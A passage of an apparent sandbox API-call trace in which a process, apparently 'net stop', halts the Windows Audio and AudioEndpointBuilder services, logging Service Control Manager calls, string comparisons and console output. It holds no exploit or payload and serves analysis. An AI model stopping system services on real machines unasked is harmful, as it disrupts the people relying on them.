-19 [0188.556] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3120648 [0188.556] OpenServiceW (hSCManager=0x3120648, lpServiceName="Audiosrv", dwDesiredAccess=0x84) returned 0x3120940 [0188.557] ControlService (in: hService=0x3120940, dwControl=0x4, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0xa, dwWaitHint=0x1388)) returned 0 [0188.557] GetLastError () returned 0x425 [0188.557] QueryServiceStatus (in: hService=0x3120940, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0xa, dwWaitHint=0x1388)) returned 1 [0188.557] LocalAlloc (uFlags=0x40, uBytes=0x2e) returned 0x3118820 [0188.557] wcscpy_s (in: _Destination=0x311883c, _SizeInWords=0x9, _Source="Audiosrv" | out: _Destination="Audiosrv") returned 0x0 [0188.557] CloseServiceHandle (hSCObject=0x3120648) returned 1 [0188.557] CloseServiceHandle (hSCObject=0x3120940) returned 1 [0188.557] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x30bf6e8 | out: Buffer=0x30bf6e8*=0x31250b0) returned 0x0 [0188.557] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0188.557] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0188.557] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0188.558] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0188.558] wcsncpy_s (in: _Destination=0x312527e, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0188.558] wcsncpy_s (in: _Destination=0x312526c, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0188.558] NetApiBufferFree (Buffer=0x3118820) returned 0x0 [0188.558] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format=".", _ArgList=0x30bf700 | out: _Buffer=".") returned 1 [0188.558] GetFileType (hFile=0x90) returned 0x2 [0188.559] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf6ec | out: lpMode=0x30bf6ec) returned 1 [0189.083] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x30bf6f0, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x30bf6f0*=0x1) returned 1 [0189.532] Sleep (dwMilliseconds=0x9c4) [0192.494] NetApiBufferFree (Buffer=0x31250b0) returned 0x0 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0192.495] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0192.496] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3120738 [0192.496] OpenServiceW (hSCManager=0x3120738, lpServiceName="Audiosrv", dwDesiredAccess=0x84) returned 0x3120698 [0192.497] ControlService (in: hService=0x3120698, dwControl=0x4, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0xb, dwWaitHint=0x1388)) returned 0 [0192.497] GetLastError () returned 0x425 [0192.497] QueryServiceStatus (in: hService=0x3120698, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0xb, dwWaitHint=0x1388)) returned 1 [0192.497] LocalAlloc (uFlags=0x40, uBytes=0x2e) returned 0x3118778 [0192.497] wcscpy_s (in: _Destination=0x3118794, _SizeInWords=0x9, _Source="Audiosrv" | out: _Destination="Audiosrv") returned 0x0 [0192.497] CloseServiceHandle (hSCObject=0x3120738) returned 1 [0192.497] CloseServiceHandle (hSCObject=0x3120698) returned 1 [0192.498] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x30bf6e8 | out: Buffer=0x30bf6e8*=0x31250b0) returned 0x0 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0192.498] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0192.499] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0192.499] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0192.499] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0192.499] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0192.499] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0192.499] wcsncpy_s (in: _Destination=0x312527e, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0192.499] wcsncpy_s (in: _Destination=0x312526c, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0192.499] NetApiBufferFree (Buffer=0x3118778) returned 0x0 [0192.499] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format=".", _ArgList=0x30bf700 | out: _Buffer=".") returned 1 [0192.499] GetFileType (hFile=0x90) returned 0x2 [0192.499] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf6ec | out: lpMode=0x30bf6ec) returned 1 [0193.268] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x30bf6f0, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x30bf6f0*=0x1) returned 1 [0194.041] Sleep (dwMilliseconds=0x9c4) [0197.017] NetApiBufferFree (Buffer=0x31250b0) returned 0x0 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0197.017] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0197.017] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3120878 [0197.018] OpenServiceW (hSCManager=0x3120878, lpServiceName="Audiosrv", dwDesiredAccess=0x84) returned 0x3120828 [0197.018] ControlService (in: hService=0x3120828, dwControl=0x4, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0197.018] GetLastError () returned 0x426 [0197.018] QueryServiceStatus (in: hService=0x3120828, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0197.019] LocalAlloc (uFlags=0x40, uBytes=0x2e) returned 0x3118698 [0197.019] wcscpy_s (in: _Destination=0x31186b4, _SizeInWords=0x9, _Source="Audiosrv" | out: _Destination="Audiosrv") returned 0x0 [0197.019] CloseServiceHandle (hSCObject=0x3120878) returned 1 [0197.019] CloseServiceHandle (hSCObject=0x3120828) returned 1 [0197.019] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x30bf6e8 | out: Buffer=0x30bf6e8*=0x31250b0) returned 0x0 [0197.019] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0197.019] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0197.019] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0197.019] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0197.019] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0197.019] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0197.019] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0197.019] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0197.019] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0197.019] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0197.019] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0197.019] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0197.019] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0197.019] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0197.019] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0197.019] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0197.019] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0197.020] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0197.020] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0197.020] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0197.020] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0197.020] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0197.020] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0197.020] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0197.020] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0197.020] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0197.020] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0197.020] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0197.020] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0197.020] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0197.020] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0197.020] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0197.020] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0197.020] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0197.020] wcsncpy_s (in: _Destination=0x312527e, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0197.020] wcsncpy_s (in: _Destination=0x312526c, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0197.020] NetApiBufferFree (Buffer=0x3118698) returned 0x0 [0197.020] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format="\r\n", _ArgList=0x30bf700 | out: _Buffer="\r\n") returned 2 [0197.020] GetFileType (hFile=0x90) returned 0x2 [0197.020] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf6ec | out: lpMode=0x30bf6ec) returned 1 [0197.826] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30bf6f0, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x30bf6f0*=0x2) returned 1 [0198.120] NetApiBufferFree (Buffer=0x31250b0) returned 0x0 [0198.120] GetServiceDisplayNameW (in: hSCManager=0x31208a0, lpServiceName="Audiosrv", lpDisplayName=0x2c7820, lpcchBuffer=0x30bf730 | out: lpDisplayName="Windows Audio", lpcchBuffer=0x30bf730) returned 1 [0198.120] FormatMessageW (in: dwFlags=0x2800, lpSource=0x3370002, dwMessageId=0xdc9, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="The Windows Audio service was stopped successfully.\r\n") returned 0x35 [0198.121] GetFileType (hFile=0x90) returned 0x2 [0198.121] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf734 | out: lpMode=0x30bf734) returned 1 [0198.363] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x35, lpNumberOfCharsWritten=0x30bf73c, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x30bf73c*=0x35) returned 1 [0198.733] GetFileType (hFile=0x90) returned 0x2 [0198.733] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf734 | out: lpMode=0x30bf734) returned 1 [0199.030] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30bf73c, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x30bf73c*=0x2) returned 1 [0199.935] NetApiBufferFree (Buffer=0x3122040) returned 0x0 [0199.935] CloseServiceHandle (hSCObject=0x31208c8) returned 1 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="WORKSTATION") returned -22 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanWorkstation") returned -11 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SERVER") returned -18 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanServer") returned -11 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SQLSERVER") returned -18 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REPLICATOR") returned -17 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="REMOTEBOOT") returned -17 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TIMESOURCE") returned -19 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0199.936] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="AFP") returned 15 [0199.937] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0199.937] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="UPS") returned -20 [0199.937] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0199.937] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="XACTSRV") returned -23 [0199.937] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0199.937] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="TCPIP") returned -19 [0199.937] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3120918 [0199.937] OpenServiceW (hSCManager=0x3120918, lpServiceName="AUDIOENDPOINTBUILDER", dwDesiredAccess=0x20) returned 0x3120940 [0199.937] ControlService (in: hService=0x3120940, dwControl=0x1, lpServiceStatus=0x30bf858 | out: lpServiceStatus=0x30bf858*(dwServiceType=0x20, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x2, dwWaitHint=0x1388)) returned 1 [0200.345] LocalAlloc (uFlags=0x40, uBytes=0x46) returned 0x3123440 [0200.345] wcscpy_s (in: _Destination=0x312345c, _SizeInWords=0x15, _Source="AUDIOENDPOINTBUILDER" | out: _Destination="AUDIOENDPOINTBUILDER") returned 0x0 [0200.345] CloseServiceHandle (hSCObject=0x3120918) returned 1 [0200.346] CloseServiceHandle (hSCObject=0x3120940) returned 1 [0200.346] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x30bf8b0 | out: Buffer=0x30bf8b0*=0x31250b0) returned 0x0 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="WORKSTATION") returned -22 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanWorkstation") returned -11 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SERVER") returned -18 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="LanmanServer") returned -11 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="BROWSER") returned -1 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="MESSENGER") returned -12 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETRUN") returned -13 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="SPOOLER") returned -18 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="ALERTER") returned 9 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETLOGON") returned -13 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0200.346] _wcsicmp (_String1="AUDIOENDPOINTBUILDER", _String2="NETPOPUP") returned -13 [0200.346] 